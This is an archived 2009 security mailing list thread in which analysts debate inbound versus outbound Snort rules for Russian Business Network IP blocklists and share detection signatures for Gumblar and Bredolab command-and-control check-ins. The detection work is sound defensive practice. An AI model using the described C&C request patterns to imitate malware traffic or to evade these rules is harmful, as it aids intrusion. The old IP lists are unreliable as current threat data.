notices about internal machine trying to make contact with RBN networks... this 
second one seen mainly as a good way to track down the infested machine(s) for 
cleaning... especially since the RBN networks are already blocked by the first ;)

-- 
        _\/
       (@@)                      Waldo Kitty, Waldo's Place USA
__ooO_( )_Ooo_____________________ telnet://bbs.wpusa.dynip.com
_|_____|_____|_____|_____|_____|_____ http://www.wpusa.dynip.com
____|_____|_____|_____|_____|_____|____ ftp://ftp.wpusa.dynip.com
_|_Eat_SPAM_to_email_me!_YUM!__|_____ wkitty42 -at- windstream.net

From eoin.miller at trojanedbinaries.com  Tue May 26 19:05:08 2009
From: eoin.miller at trojanedbinaries.com (Eoin Miller)
Date: Tue, 26 May 2009 19:05:08 -0400
Subject: [Emerging-Sigs] IP List rulesets
In-Reply-To: <4A1C62F5.8030100@windstream.net>
References: <4A131D81.3040907@jonkmans.com>	<4A133285.1060104@trojanedbinaries.com>	<4A13383B.1000608@jonkmans.com>	<4A136CA5.1080303@trojanedbinaries.com>	<20090520030114.GA42575@knobbe.us>	<4A142D5E.4050201@jonkmans.com>	<4A1ACE8A.2040205@trojanedbinaries.com>	<839aec700905251411v54dc822em14b2447a71841423@mail.gmail.com>	<3D537FAD-14EE-4193-9FE1-022380E728D4@trojanedbinaries.com>
	<4A1C62F5.8030100@windstream.net>
Message-ID: <4A1C75A4.9070106@trojanedbinaries.com>

Please review the current rbn-rules as they do not alert/block to any
outgoing TCP connections to the RBN:

alert tcp
[114.80.67.30,114.80.67.32,115.126.2.116,115.126.2.117,115.126.2.118,115.126.2.121,115.126.2.140,115.126.2.141,115.126.2.233,115.126.2.8]
any -> $HOME_NET any (msg:"ET RBN Known Russian Business Network IP TCP
(1)"; flags:S;
reference:url,doc.emergingthreats.net/bin/view/Main/RussianBusinessNetwork;
threshold: type limit, track by_src, seconds 60, count 1;
classtype:misc-attack; sid:2406000; rev:130;)

Short of doubling the rules (one for incoming and the other for
outgoing) adding the SA flag, instead of just the S flag, tracks who is
reaching out instead of just who is reaching in. Clients are not
infected by RBN reaching in, they are infected by reaching out to
malicious sites. Once infected, they reach out again. The above rule
stops reaching IN from RBN, but does nothing to stop an infected machine
from reaching out nor does it stop a clean machine from reaching OUT to
a drive by site.

--
Eoin Miller



waldo kitty wrote:
> Eoin Miller wrote:
>> only catches connections coming inbound from the RBN network and you
>> are generally more concerned with people reaching out to the RBN as
>> they are downloading malware/joining botnets from behind your NAT'd
>> firewalls.
>
> yes and no... we do not want /any/ access attempts to out network
> allowed...
> from inside or "cold calling" probes from outside... we see where a
> two layered
> approach is a GoodThing<tm>... the first layer being to monitor for
> any access
> attempts to our network from any/all RBN networks... the second, being
> the
> notices about internal machine trying to make contact with RBN
> networks... this
> second one seen mainly as a good way to track down the infested
> machine(s) for
> cleaning... especially since the RBN networks are already blocked by
> the first ;)
>


From wkitty42 at windstream.net  Tue May 26 20:40:43 2009
From: wkitty42 at windstream.net (waldo kitty)
Date: Tue, 26 May 2009 20:40:43 -0400
Subject: [Emerging-Sigs] IP List rulesets
In-Reply-To: <4A1C75A4.9070106@trojanedbinaries.com>
References: <4A131D81.3040907@jonkmans.com>	<4A133285.1060104@trojanedbinaries.com>	<4A13383B.1000608@jonkmans.com>	<4A136CA5.1080303@trojanedbinaries.com>	<20090520030114.GA42575@knobbe.us>	<4A142D5E.4050201@jonkmans.com>	<4A1ACE8A.2040205@trojanedbinaries.com>	<839aec700905251411v54dc822em14b2447a71841423@mail.gmail.com>	<3D537FAD-14EE-4193-9FE1-022380E728D4@trojanedbinaries.com>
	<4A1C62F5.8030100@windstream.net>
	<4A1C75A4.9070106@trojanedbinaries.com>
Message-ID: <4A1C8C0B.2090408@windstream.net>

Eoin Miller wrote:
> Please review the current rbn-rules as they do not alert/block to any
> outgoing TCP connections to the RBN:

been there, done that ;)

my understanding in this set of RBN oriented threads is that some have proposed 
sets of rules for both, internally looking and externally looking sensors...

[trim of example rule]

  > Short of doubling the rules (one for incoming and the other for
> outgoing) adding the SA flag, instead of just the S flag, tracks who is
> reaching out instead of just who is reaching in. 

this doubling has been proposed...

> Clients are not
> infected by RBN reaching in, they are infected by reaching out to
> malicious sites. Once infected, they reach out again.

right... but my/our concern is not just for clients reaching out but also of RBN 
sites "cold calling" and trying to force their way into possibly insecure servers ;)

> The above rule
> stops reaching IN from RBN, but does nothing to stop an infected machine
> from reaching out nor does it stop a clean machine from reaching OUT to
> a drive by site.


understood... maybe i'm getting lost in what the actual proposal(s) are looking 
to tag? the existing rules have allowed us to block any and all accesses from 
RBN machines on the outside... "doubling up on the rules" would also allow us to 
determine which internal machines are reaching out ;)

some networks have internally facing sensors while others have externally facing 
ones... then there are those that have internal and external watchers ;)

> --
> Eoin Miller
> 
> 
> 
> waldo kitty wrote:
>> Eoin Miller wrote:
>>> only catches connections coming inbound from the RBN network and you
>>> are generally more concerned with people reaching out to the RBN as
>>> they are downloading malware/joining botnets from behind your NAT'd
>>> firewalls.
>> yes and no... we do not want /any/ access attempts to out network
>> allowed...
>> from inside or "cold calling" probes from outside... we see where a
>> two layered
>> approach is a GoodThing<tm>... the first layer being to monitor for
>> any access
>> attempts to our network from any/all RBN networks... the second, being
>> the
>> notices about internal machine trying to make contact with RBN
>> networks... this
>> second one seen mainly as a good way to track down the infested
>> machine(s) for
>> cleaning... especially since the RBN networks are already blocked by
>> the first ;)


-- 
        _\/
       (@@)                      Waldo Kitty, Waldo's Place USA
__ooO_( )_Ooo_____________________ telnet://bbs.wpusa.dynip.com
_|_____|_____|_____|_____|_____|_____ http://www.wpusa.dynip.com
____|_____|_____|_____|_____|_____|____ ftp://ftp.wpusa.dynip.com
_|_Eat_SPAM_to_email_me!_YUM!__|_____ wkitty42 -at- windstream.net

From mcholste at gmail.com  Wed May 27 10:00:54 2009
From: mcholste at gmail.com (Martin Holste)
Date: Wed, 27 May 2009 09:00:54 -0500
Subject: [Emerging-Sigs] IP List rulesets
In-Reply-To: <4A1C8C0B.2090408@windstream.net>
References: <4A131D81.3040907@jonkmans.com>
	<4A136CA5.1080303@trojanedbinaries.com>
	<20090520030114.GA42575@knobbe.us> <4A142D5E.4050201@jonkmans.com>
	<4A1ACE8A.2040205@trojanedbinaries.com>
	<839aec700905251411v54dc822em14b2447a71841423@mail.gmail.com>
	<3D537FAD-14EE-4193-9FE1-022380E728D4@trojanedbinaries.com>
	<4A1C62F5.8030100@windstream.net>
	<4A1C75A4.9070106@trojanedbinaries.com>
	<4A1C8C0B.2090408@windstream.net>
Message-ID: <df9074860905270700y2abd4c35xa261c04925c6f040@mail.gmail.com>

Ok, I submit that while both parties are right on the which is important,
inbound vs. outbound connections, the two scenarios are separate problems
and should be handled by separate tools.  Specifically, detecting inbound
scans is something I find much more suited for Netflow or another
session-based flow tracker.  If you're really that concerned with inbound
scans, then you need a more dedicated framework to analyzing traffic flows
in general.  I myself prefer IPAudit, one of the lesser-known flow modules
out on Sourceforge.  I use it to put all my flows in a database, then I can
run statistical analysis and searches easily.  You can create scripts that
will auto-shun, etc. that way is much more efficient than trying to bend
Snort into a a function that truthfully is not one of its "core
competencies."  I'm sure some of you will argue that point, but when you
take a step back and look at Snort, what it does best is high-level protocol
reassembly and grepping.  The flow analysis parts are just there to aid the
grepping parts.  And yes, I know that "Snort is not just a traffic grepper,"
but certainly that is its primary function.  Let me put it this way: when
you've got a hammer, everything looks like a nail.

So, my vote would be to drop the inbound scans and keep just the outbound
scans because inbound scans are more statistically relevant than tactically
relevant.

--Martin

On Tue, May 26, 2009 at 7:40 PM, waldo kitty <wkitty42 at windstream.net>wrote:

> Eoin Miller wrote:
> > Please review the current rbn-rules as they do not alert/block to any
> > outgoing TCP connections to the RBN:
>
> been there, done that ;)
>
> my understanding in this set of RBN oriented threads is that some have
> proposed
> sets of rules for both, internally looking and externally looking
> sensors...
>
> [trim of example rule]
>
>  > Short of doubling the rules (one for incoming and the other for
> > outgoing) adding the SA flag, instead of just the S flag, tracks who is
> > reaching out instead of just who is reaching in.
>
> this doubling has been proposed...
>
> > Clients are not
> > infected by RBN reaching in, they are infected by reaching out to
> > malicious sites. Once infected, they reach out again.
>
> right... but my/our concern is not just for clients reaching out but also
> of RBN
> sites "cold calling" and trying to force their way into possibly insecure
> servers ;)
>
> > The above rule
> > stops reaching IN from RBN, but does nothing to stop an infected machine
> > from reaching out nor does it stop a clean machine from reaching OUT to
> > a drive by site.
>
>
> understood... maybe i'm getting lost in what the actual proposal(s) are
> looking
> to tag? the existing rules have allowed us to block any and all accesses
> from
> RBN machines on the outside... "doubling up on the rules" would also allow
> us to
> determine which internal machines are reaching out ;)
>
> some networks have internally facing sensors while others have externally
> facing
> ones... then there are those that have internal and external watchers ;)
>
> > --
> > Eoin Miller
> >
> >
> >
> > waldo kitty wrote:
> >> Eoin Miller wrote:
> >>> only catches connections coming inbound from the RBN network and you
> >>> are generally more concerned with people reaching out to the RBN as
> >>> they are downloading malware/joining botnets from behind your NAT'd
> >>> firewalls.
> >> yes and no... we do not want /any/ access attempts to out network
> >> allowed...
> >> from inside or "cold calling" probes from outside... we see where a
> >> two layered
> >> approach is a GoodThing<tm>... the first layer being to monitor for
> >> any access
> >> attempts to our network from any/all RBN networks... the second, being
> >> the
> >> notices about internal machine trying to make contact with RBN
> >> networks... this
> >> second one seen mainly as a good way to track down the infested
> >> machine(s) for
> >> cleaning... especially since the RBN networks are already blocked by
> >> the first ;)
>
>
> --
>        _\/
>       (@@)                      Waldo Kitty, Waldo's Place USA
> __ooO_( )_Ooo_____________________ telnet://bbs.wpusa.dynip.com
> _|_____|_____|_____|_____|_____|_____ http://www.wpusa.dynip.com
> ____|_____|_____|_____|_____|_____|____ ftp://ftp.wpusa.dynip.com
> _|_Eat_SPAM_to_email_me!_YUM!__|_____ wkitty42 -at- windstream.net
> _______________________________________________
> Emerging-sigs mailing list
> Emerging-sigs at emergingthreats.net
> http://lists.emergingthreats.net/mailman/listinfo/emerging-sigs
>
-------------- next part --------------
An HTML attachment was scrubbed...
URL: http://lists.emergingthreats.net/pipermail/emerging-sigs/attachments/20090527/2c3b0fe5/attachment.html

From jaime.blasco at alienvault.com  Wed May 27 10:59:10 2009
From: jaime.blasco at alienvault.com (Jaime Blasco)
Date: Wed, 27 May 2009 16:59:10 +0200
Subject: [Emerging-Sigs] Gumblar Activity
Message-ID: <53834cf20905270759s44540bb2u7d56a35d0444354f@mail.gmail.com>

Hi!,

I've been investigating Gumblar activity last week, here is an interesting
article relating Gumblar's activity:
www.martinsecurity.net/2009/05/20/inside-the-massive-gumblar-attacka-dentro-del-enorme-ataque-gumblar/

And here are some rules to detect gumblar's c&c activity:

alert tcp $HOME_NET any -> $EXTERNAL_NET $HTTP_PORTS (msg:"ET MALWARE
Gumblar checkin"; content:"GET "; depth:4; uricontent:"controller.php";
uricontent:"action=bot"; uricontent:"&entity_list="; uricontent:"&uid=";
uricontent:"&first="; uricontent:"&guid="; uricontent:"&rnd=";
classtype:trojan-activity; reference:url,
www.martinsecurity.net/2009/05/20/inside-the-massive-gumblar-attacka-dentro-del-enorme-ataque-gumblar/;
sid:; rev:1;)

alert tcp $HOME_NET any -> $EXTERNAL_NET $HTTP_PORTS (msg:"ET MALWARE
Gumblar check in type request"; content:"GET "; depth:4; uricontent:"v=";
uricontent:"&s="; uricontent:"&uid="; uricontent:"&p="; uricontent:"&q=";
content:"User-Agent\:|0d 0a|"; classtype:trojan-activity; reference:url,
www.martinsecurity.net/2009/05/20/inside-the-massive-gumblar-attacka-dentro-del-enorme-ataque-gumblar/;
sid:; rev:1;)

Anyway I detect that the first rule is similar to this presen ton emerging
rules.

emerging-all.rules:alert tcp $HOME_NET any -> $EXTERNAL_NET $HTTP_PORTS
(msg:"ET TROJAN Peed Report to Controller"; flow:established,to_server;
uricontent:"/controller.php?action="; uricontent:"&entity";
uricontent:"&rnd="; classtype:trojan-activity; reference:url,
doc.emergingthreats.net/2008501; reference:url,
www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/VIRUS/TROJAN_Peed;
sid:2008501; rev:2;)


Check it.

Regards

-- 
_______________________________

Jaime Blasco

www.ossim.com
www.alienvault.com
Email: jaime.blasco at alienvault.com
-------------- next part --------------
An HTML attachment was scrubbed...
URL: http://lists.emergingthreats.net/pipermail/emerging-sigs/attachments/20090527/2be798fa/attachment.html

From dxp2532 at gmail.com  Wed May 27 11:11:47 2009
From: dxp2532 at gmail.com (dxp)
Date: Wed, 27 May 2009 11:11:47 -0400
Subject: [Emerging-Sigs] Gumblar Activity
In-Reply-To: <53834cf20905270759s44540bb2u7d56a35d0444354f@mail.gmail.com>
References: <53834cf20905270759s44540bb2u7d56a35d0444354f@mail.gmail.com>
Message-ID: <1243437107.7039.8.camel@kinta>

Thre's already one in the set by Darren Spruell:

        /etc/snort/rules/emerging-virus.rules-344-#by Darren Spruell
        
        /etc/snort/rules/emerging-virus.rules:345:alert tcp $HOME_NET
        any -> $EXTERNAL_NET $HTTP_PORTS (msg:"ET TROJAN Bredolab
        Downloader Communicating With Controller (1)";
        flow:established,to_server; uricontent:"action="; nocase;
        uricontent:"&entity_list="; nocase; uricontent:"&uid="; nocase;
        uricontent:"&first="; uricontent:"&guid="; nocase;
        uricontent:"&rnd="; nocase; classtype:trojan-activity;
        reference:url,www.microsoft.com/security/portal/Entry.aspx?Name=TrojanDownloader:Win32/Bredolab.B; sid:2009353; rev:1;)
        

-  

-=[ dxp ]=-
0xA3F3C6E3



On Wed, 2009-05-27 at 16:59 +0200, Jaime Blasco wrote:

> alert tcp $HOME_NET any -> $EXTERNAL_NET $HTTP_PORTS (msg:"ET MALWARE
> Gumblar checkin"; content:"GET "; depth:4;
> uricontent:"controller.php"; uricontent:"action=bot";
> uricontent:"&entity_list="; uricontent:"&uid="; uricontent:"&first=";
> uricontent:"&guid="; uricontent:"&rnd="; classtype:trojan-activity;
> reference:url,www.martinsecurity.net/2009/05/20/inside-the-massive-gumblar-attacka-dentro-del-enorme-ataque-gumblar/; sid:; rev:1;)
-------------- next part --------------
An HTML attachment was scrubbed...
URL: http://lists.emergingthreats.net/pipermail/emerging-sigs/attachments/20090527/831fee89/attachment-0001.html
-------------- next part --------------
A non-text attachment was scrubbed...
Name: not available
Type: application/pgp-signature
Size: 189 bytes
Desc: This is a digitally signed message part
Url : http://lists.emergingthreats.net/pipermail/emerging-sigs/attachments/20090527/831fee89/attachment-0001.bin

From jaime.blasco at alienvault.com  Wed May 27 11:14:20 2009
From: jaime.blasco at alienvault.com (Jaime Blasco)
Date: Wed, 27 May 2009 17:14:20 +0200
Subject: [Emerging-Sigs] Gumblar Activity
In-Reply-To: <1243437107.7039.8.camel@kinta>
References: <53834cf20905270759s44540bb2u7d56a35d0444354f@mail.gmail.com>
	<1243437107.7039.8.camel@kinta>
Message-ID: <53834cf20905270814u2772e085o2b44a588e4ee87a8@mail.gmail.com>

Yeah, we can use the second one:

alert tcp $HOME_NET any -> $EXTERNAL_NET $HTTP_PORTS (msg:"ET MALWARE
Gumblar check in type request"; content:"GET "; depth:4; uricontent:"v=";
uricontent:"&s="; uricontent:"&uid="; uricontent:"&p="; uricontent:"&q=";
content:"User-Agent\:|0d 0a|"; classtype:trojan-activity; reference:url,
www.martinsecurity.net/2009/05/20/inside-the-massive-gumblar-attacka-dentro-del-enorme-ataque-gumblar/;
sid:; rev:1;)

to have more c&c traffic coverage.

Regards

2009/5/27 dxp <dxp2532 at gmail.com>

>  Thre's already one in the set by Darren Spruell:
>
> */etc/snort/rules/emerging-virus.rules-344*-#by Darren Spruell
>
> */etc/snort/rules/emerging-virus.rules:345:*alert tcp $HOME_NET any ->
> $EXTERNAL_NET $HTTP_PORTS (msg:"ET TROJAN Bredolab Downloader Communicating
> With Controller (1)"; flow:established,to_server; uricontent:"action=";
> nocase; uricontent:"&entity_list="; nocase; uricontent:"&uid="; nocase;
> uricontent:"&first="; uricontent:"&guid="; nocase; uricontent:"&rnd=";
> nocase; classtype:trojan-activity; reference:url,
> www.microsoft.com/security/portal/Entry.aspx?Name=TrojanDownloader:Win32/Bredolab.B;
> sid:2009353; rev:1;)
>
>   -
>
> -=[ dxp ]=-
> 0xA3F3C6E3
>
>
>
>
> On Wed, 2009-05-27 at 16:59 +0200, Jaime Blasco wrote:
>
> alert tcp $HOME_NET any -> $EXTERNAL_NET $HTTP_PORTS (msg:"ET MALWARE
> Gumblar checkin"; content:"GET "; depth:4; uricontent:"controller.php";
> uricontent:"action=bot"; uricontent:"&entity_list="; uricontent:"&uid=";
> uricontent:"&first="; uricontent:"&guid="; uricontent:"&rnd=";
> classtype:trojan-activity; reference:url,
> www.martinsecurity.net/2009/05/20/inside-the-massive-gumblar-attacka-dentro-del-enorme-ataque-gumblar/;
> sid:; rev:1;)
>
>


-- 
_______________________________

Jaime Blasco

www.ossim.com
www.alienvault.com
Email: jaime.blasco at alienvault.com
-------------- next part --------------
An HTML attachment was scrubbed...
URL: http://lists.emergingthreats.net/pipermail/emerging-sigs/attachments/20090527/459c86e0/attachment.html

From jjohnson at jdmc.org  Wed May 27 11:22:13 2009
From: jjohnson at jdmc.org (John Johnson)
Date: Wed, 27 May 2009 10:22:13 -0500
Subject: [Emerging-Sigs] IP List rulesets
In-Reply-To: <df9074860905270700y2abd4c35xa261c04925c6f040@mail.gmail.com>
References: <4A131D81.3040907@jonkmans.com>	<4A136CA5.1080303@trojanedbinaries.com>	<20090520030114.GA42575@knobbe.us>
	<4A142D5E.4050201@jonkmans.com>	<4A1ACE8A.2040205@trojanedbinaries.com>	<839aec700905251411v54dc822em14b2447a71841423@mail.gmail.com>	<3D537FAD-14EE-4193-9FE1-022380E728D4@trojanedbinaries.com>	<4A1C62F5.8030100@windstream.net>	<4A1C75A4.9070106@trojanedbinaries.com>	<4A1C8C0B.2090408@windstream.net>
	<df9074860905270700y2abd4c35xa261c04925c6f040@mail.gmail.com>
Message-ID: <4A1D5AA5.3080200@jdmc.org>

Martin Holste wrote:
>  Let me put it this way: when you've got a hammer, everything looks like a nail.
>
>   
   And when you magically turn other people's hammers into saw's, they can
  no longer hammer.

  However, if I know whats coming in advance, I'm sure a little local perl
  can generate an external set of rules from an internal views set.

john


From jonkman at jonkmans.com  Wed May 27 11:48:19 2009
From: jonkman at jonkmans.com (Matt Jonkman)
Date: Wed, 27 May 2009 11:48:19 -0400
Subject: [Emerging-Sigs] Gumblar Activity
In-Reply-To: <53834cf20905270814u2772e085o2b44a588e4ee87a8@mail.gmail.com>
References: <53834cf20905270759s44540bb2u7d56a35d0444354f@mail.gmail.com>	<1243437107.7039.8.camel@kinta>
	<53834cf20905270814u2772e085o2b44a588e4ee87a8@mail.gmail.com>
Message-ID: <4A1D60C3.7000006@jonkmans.com>

Got it, thanks Jaime!

Matt

Jaime Blasco wrote:
> Yeah, we can use the second one:
> 
> alert tcp $HOME_NET any -> $EXTERNAL_NET $HTTP_PORTS (msg:"ET MALWARE
> Gumblar check in type request"; content:"GET "; depth:4;
> uricontent:"v="; uricontent:"&s="; uricontent:"&uid="; uricontent:"&p=";
> uricontent:"&q="; content:"User-Agent\:|0d 0a|";
> classtype:trojan-activity;
> reference:url,www.martinsecurity.net/2009/05/20/inside-the-massive-gumblar-attacka-dentro-del-enorme-ataque-gumblar/
> <http://www.martinsecurity.net/2009/05/20/inside-the-massive-gumblar-attacka-dentro-del-enorme-ataque-gumblar/>;
> sid:; rev:1;)
> 
> to have more c&c traffic coverage.
> 
> Regards
> 
> 2009/5/27 dxp <dxp2532 at gmail.com <mailto:dxp2532 at gmail.com>>
> 
>     Thre's already one in the set by Darren Spruell:
> 
>         */etc/snort/rules/emerging-virus.rules-344*-#by Darren Spruell
> 
>         */etc/snort/rules/emerging-virus.rules:345:*alert tcp $HOME_NET
>         any -> $EXTERNAL_NET $HTTP_PORTS (msg:"ET TROJAN Bredolab
>         Downloader Communicating With Controller (1)";
>         flow:established,to_server; uricontent:"action="; nocase;
>         uricontent:"&entity_list="; nocase; uricontent:"&uid="; nocase;
>         uricontent:"&first="; uricontent:"&guid="; nocase;
>         uricontent:"&rnd="; nocase; classtype:trojan-activity;
>         reference:url,www.microsoft.com/security/portal/Entry.aspx?Name=TrojanDownloader:Win32/Bredolab.B
>         <http://www.microsoft.com/security/portal/Entry.aspx?Name=TrojanDownloader:Win32/Bredolab.B>;
>         sid:2009353; rev:1;)
> 
>     -  
> 
>     -=[ dxp ]=-
>     0xA3F3C6E3
> 
> 
> 
> 
>     On Wed, 2009-05-27 at 16:59 +0200, Jaime Blasco wrote:
>>     alert tcp $HOME_NET any -> $EXTERNAL_NET $HTTP_PORTS (msg:"ET
>>     MALWARE Gumblar checkin"; content:"GET "; depth:4;
>>     uricontent:"controller.php"; uricontent:"action=bot";
>>     uricontent:"&entity_list="; uricontent:"&uid=";
>>     uricontent:"&first="; uricontent:"&guid="; uricontent:"&rnd=";
>>     classtype:trojan-activity;
>>     reference:url,www.martinsecurity.net/2009/05/20/inside-the-massive-gumblar-attacka-dentro-del-enorme-ataque-gumblar/
>>     <http://www.martinsecurity.net/2009/05/20/inside-the-massive-gumblar-attacka-dentro-del-enorme-ataque-gumblar/>;
>>     sid:; rev:1;) 
> 
> 
> 
> 
> -- 
> _______________________________
> 
> Jaime Blasco
> 
> www.ossim.com <http://www.ossim.com>
> www.alienvault.com <http://www.alienvault.com>
> Email: jaime.blasco at alienvault.com <mailto:jaime.blasco at alienvault.com>
> 
> 
> ------------------------------------------------------------------------
> 
> _______________________________________________
> Emerging-sigs mailing list
> Emerging-sigs at emergingthreats.net
> http://lists.emergingthreats.net/mailman/listinfo/emerging-sigs

-- 
--------------------------------------------
Matthew Jonkman
Emerging Threats
Phone 765-429-0398
Fax 312-264-0205
http://www.emergingthreats.net
--------------------------------------------

PGP: http://www.jonkmans.com/mattjonkman.asc



From jonkman at jonkmans.com  Wed May 27 11:56:27 2009
From: jonkman at jonkmans.com (Matt Jonkman)
Date: Wed, 27 May 2009 11:56:27 -0400
Subject: [Emerging-Sigs] Programmers and an Update
Message-ID: <4A1D62AB.9020006@jonkmans.com>

We're grateful for all the applications to date for the coding and
project management positions at the OISF. We have the PM slot filled and
many programmers.

We're making the final programmer hiring decisions for the initial team
next week, so please send a resume if you haven't yet and are
interested. Again this will be remote contract work at a good rate, part
time to full time.

Thanks all! We're just about to really get rolling!

Matt

-- 
--------------------------------------------
Matthew Jonkman
Emerging Threats
Phone 765-429-0398
Fax 312-264-0205
http://www.emergingthreats.net
--------------------------------------------

PGP: http://www.jonkmans.com/mattjonkman.asc



From eoin.miller at trojanedbinaries.com  Wed May 27 12:06:39 2009
From: eoin.miller at trojanedbinaries.com (Eoin Miller)
Date: Wed, 27 May 2009 12:06:39 -0400
Subject: [Emerging-Sigs] IP List rulesets
In-Reply-To: <4A1C8C0B.2090408@windstream.net>
References: <4A131D81.3040907@jonkmans.com>	<4A133285.1060104@trojanedbinaries.com>	<4A13383B.1000608@jonkmans.com>	<4A136CA5.1080303@trojanedbinaries.com>	<20090520030114.GA42575@knobbe.us>	<4A142D5E.4050201@jonkmans.com>	<4A1ACE8A.2040205@trojanedbinaries.com>	<839aec700905251411v54dc822em14b2447a71841423@mail.gmail.com>	<3D537FAD-14EE-4193-9FE1-022380E728D4@trojanedbinaries.com>
	<4A1C62F5.8030100@windstream.net>
	<4A1C75A4.9070106@trojanedbinaries.com>
	<4A1C8C0B.2090408@windstream.net>
Message-ID: <4A1D650F.9040100@trojanedbinaries.com>

I think the difference actually lies in the implementation at differing
sites. Upon further review, the rbn-BLOCK rules are the way that appears
to help our situation most. However, we are not running inline or have
SnortSam configured at our site so I mistakenly ignored the contents of
the rbn-BLOCK rules. We still have to modify rbn-BLOCK to get rid of the
fwsam portion of the rule prior to use for our implementation.

Creating an incoming and outgoing ruleset is helpful for those who do
not use Snort in an IPS fashion. It is not always feasible at every
organization to do so, even if desired.

--
Eoin Miller

waldo kitty wrote:
> Eoin Miller wrote:
>> Please review the current rbn-rules as they do not alert/block to any
>> outgoing TCP connections to the RBN:
>
> been there, done that ;)
>
> my understanding in this set of RBN oriented threads is that some have
> proposed sets of rules for both, internally looking and externally
> looking sensors...
>
> [trim of example rule]
>
>  > Short of doubling the rules (one for incoming and the other for
>> outgoing) adding the SA flag, instead of just the S flag, tracks who is
>> reaching out instead of just who is reaching in. 
>
> this doubling has been proposed...
>
>> Clients are not
>> infected by RBN reaching in, they are infected by reaching out to
>> malicious sites. Once infected, they reach out again.
>
> right... but my/our concern is not just for clients reaching out but
> also of RBN sites "cold calling" and trying to force their way into
> possibly insecure servers ;)
>
>> The above rule
>> stops reaching IN from RBN, but does nothing to stop an infected machine
>> from reaching out nor does it stop a clean machine from reaching OUT to
>> a drive by site.
>
>
> understood... maybe i'm getting lost in what the actual proposal(s)
> are looking to tag? the existing rules have allowed us to block any
> and all accesses from RBN machines on the outside... "doubling up on
> the rules" would also allow us to determine which internal machines
> are reaching out ;)
>
> some networks have internally facing sensors while others have
> externally facing ones... then there are those that have internal and
> external watchers ;)
>
>> -- 
>> Eoin Miller
>>
>>
>>
>> waldo kitty wrote:
>>> Eoin Miller wrote:
>>>> only catches connections coming inbound from the RBN network and you
>>>> are generally more concerned with people reaching out to the RBN as
>>>> they are downloading malware/joining botnets from behind your NAT'd
>>>> firewalls.
>>> yes and no... we do not want /any/ access attempts to out network
>>> allowed...
>>> from inside or "cold calling" probes from outside... we see where a
>>> two layered
>>> approach is a GoodThing<tm>... the first layer being to monitor for
>>> any access
>>> attempts to our network from any/all RBN networks... the second, being
>>> the
>>> notices about internal machine trying to make contact with RBN
>>> networks... this
>>> second one seen mainly as a good way to track down the infested
>>> machine(s) for
>>> cleaning... especially since the RBN networks are already blocked by
>>> the first ;)
>
>


From jonkman at jonkmans.com  Wed May 27 12:33:11 2009
From: jonkman at jonkmans.com (Matt Jonkman)
Date: Wed, 27 May 2009 12:33:11 -0400
Subject: [Emerging-Sigs] IP List rulesets -- Possible Solution
In-Reply-To: <4A1D5AA5.3080200@jdmc.org>
References: <4A131D81.3040907@jonkmans.com>	<4A136CA5.1080303@trojanedbinaries.com>	<20090520030114.GA42575@knobbe.us>	<4A142D5E.4050201@jonkmans.com>	<4A1ACE8A.2040205@trojanedbinaries.com>	<839aec700905251411v54dc822em14b2447a71841423@mail.gmail.com>	<3D537FAD-14EE-4193-9FE1-022380E728D4@trojanedbinaries.com>	<4A1C62F5.8030100@windstream.net>	<4A1C75A4.9070106@trojanedbinaries.com>	<4A1C8C0B.2090408@windstream.net>	<df9074860905270700y2abd4c35xa261c04925c6f040@mail.gmail.com>
	<4A1D5AA5.3080200@jdmc.org>
Message-ID: <4A1D6B47.30509@jonkmans.com>

Thanks everyone for all of the opinions on this. There's no way we're
going to do it exactly as it is desired for all involved here. So here's
my train of thought:

We could publish an incoming and outgoing ruleset. Run the one you
prefer, or both.

We could go with the bi-directional indicator but that makes automated
blocking a problem, won't know who the attacker is.

I agree that the internal hosts reaching out to the outside is likely
more of a threat than the inbound scanning. An internal host reaching
out is a relatively good sign of an infection already in place. But in a
web farm it's all inbound attacks...

So I propose:

1. changing the existing RBN ruleset to HOME_NET -> RBN_Hosts

2. Renaming that ruleset file to emerging-rbn-outgoing.rules (and the
-BLOCK.rules file)

3. Create a new ruleset named emerging-rbn-incoming.rules (and the
-BLOCK.rules file) with a new sid range of 2408000-2408999



Notes:
No changes to the tor ruleset as these are all inbound related

No change to the bot-cc ruleset as these are all outbound related

No change to the dhsield attackers rulesets as these are inbound related

No change to the compromised list now, but we ought to consider it.
These could be CnC's or scanners...


This lets us run inbound and outbound where appropriate. personally I'll
be running the inbound rules on my server farms and dns nets, and the
outbound on client nets. Possibly both in some places. But we're still I
believe getting the performance gains.

Anyone see an issue with going here? If no objections I'll set this up
to go into effect friday of this week.

Matt


John Johnson wrote:
> Martin Holste wrote:
>>  Let me put it this way: when you've got a hammer, everything looks like a nail.
>>
>>   
>    And when you magically turn other people's hammers into saw's, they can
>   no longer hammer.
> 
>   However, if I know whats coming in advance, I'm sure a little local perl
>   can generate an external set of rules from an internal views set.
> 
> john
> 
> _______________________________________________
> Emerging-sigs mailing list
> Emerging-sigs at emergingthreats.net
> http://lists.emergingthreats.net/mailman/listinfo/emerging-sigs

-- 
--------------------------------------------
Matthew Jonkman
Emerging Threats
Phone 765-429-0398
Fax 312-264-0205
http://www.emergingthreats.net
--------------------------------------------

PGP: http://www.jonkmans.com/mattjonkman.asc



From mcholste at gmail.com  Wed May 27 12:37:26 2009
From: mcholste at gmail.com (Martin Holste)
Date: Wed, 27 May 2009 11:37:26 -0500
Subject: [Emerging-Sigs] IP List rulesets
In-Reply-To: <4A1D650F.9040100@trojanedbinaries.com>
References: <4A131D81.3040907@jonkmans.com> <20090520030114.GA42575@knobbe.us>
	<4A142D5E.4050201@jonkmans.com>
	<4A1ACE8A.2040205@trojanedbinaries.com>
	<839aec700905251411v54dc822em14b2447a71841423@mail.gmail.com>
	<3D537FAD-14EE-4193-9FE1-022380E728D4@trojanedbinaries.com>
	<4A1C62F5.8030100@windstream.net>
	<4A1C75A4.9070106@trojanedbinaries.com>
	<4A1C8C0B.2090408@windstream.net>
	<4A1D650F.9040100@trojanedbinaries.com>
Message-ID: <df9074860905270937p54fc88f4offf5713897b56924@mail.gmail.com>

Those are good points from both you and John.  I was trying to encourage
everyone to consider alternative methods of accomplishing their goals and to
say that in my experience, a half hour of reading up on a different program
can be worth much more than a half hour of trying to shoehorn a program I'm
familiar with to work the way I want it to.  I think that Sourcefire's RNA
product indicates that Snort is not designed to do heavy flow
recording/alerting in anything larger than a small branch office, though
Snort certainly can try if you force it to.  But the half hour I spent
reading about and installing NFSen (nfsen.sourceforge.net) was much more
productive for me than writing more Perl to fuss with the ET ruleset.

Heh, actually when I think about it though, one of the first things I did
